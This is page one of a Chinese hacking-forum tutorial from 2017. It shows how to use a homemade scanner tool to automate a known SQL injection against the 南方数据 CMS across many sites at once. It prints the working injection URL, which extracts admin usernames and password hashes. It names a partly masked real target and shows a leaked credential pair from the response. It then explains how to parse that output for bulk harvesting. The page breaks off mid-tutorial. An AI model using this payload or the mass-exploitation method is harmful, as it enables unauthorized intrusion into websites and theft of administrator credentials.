欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Fuzzer可自由扩展编写Exp网站漏洞扫描工具

来源:本站整理 作者:Ws 时间:2017-08-21 TAG: 我要投稿

这里有个南方站点:www.gu*******na.com
这个站点存在一个很老的南方的EXP,我发一下这个EXP:

/NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27

/NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27
EXP漏洞文章说明:<南方数据企业0day漏洞爆后台密码> 比较老了。
大家应该都见过了,我也就不给大家讲这个SQL了,反正就是进去之后这个样子:

那既然可以通杀,那么我们就来编写通杀的脚本。
打开我做的这款工具(应该是一个月前写的了,有些老铁应该见过)
界面简陋得很,我2小时完成的,所以大家将就着用,如果反应好的话呢,我就把他完善一下。
选择编写脚本,新建脚本。

我们开始编写代码,这里代码的描述我给大家截一下图。
PS:函数名称自己起的,比较傻,大家将就着用
我们先来说一下原理,我们打开那个南方EXP之后,查看它的源文件,会有这个样子的代码。

javastr=javastr+"<span style=\"font-size:9pt;line-height:15pt\"><img src='images/news.gif' border=0 alt='图片新闻'><a href=\"shownews.asp?id=0\" title=\"cxm|076dc286aac7e0f8\" target=\"_blank\">cxm|076dc286aac7e0f8</a></span> "
我们稍微来分析一下,可以看到有cxm|076dc286aac7e0f8这个字样,这个就是我们需要的内容,
大家都知道是啥,不说了。
那么既然是通杀,我们就可以这样子,
前边的文本固定:title=\”
后边的文本固定:\” target=\”_blank\”
我们只需要把中间的内容取出来就可以了,那么我们开始打代码。
用到的函数名称:GET单()

我们来填写参数

  • 参数1:我们的URL
  • 参数2:变量
  • 参数3:前文本地址
  • 参数4:后文本地址

讲一下
参数2是我们获取到的变量,也就是用户所提供的域名
我们怎么获取,很简单用到这个函数:获取变量()
参数1.将用户提供的参数值赋值给变量

获取变量(”域名”)

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载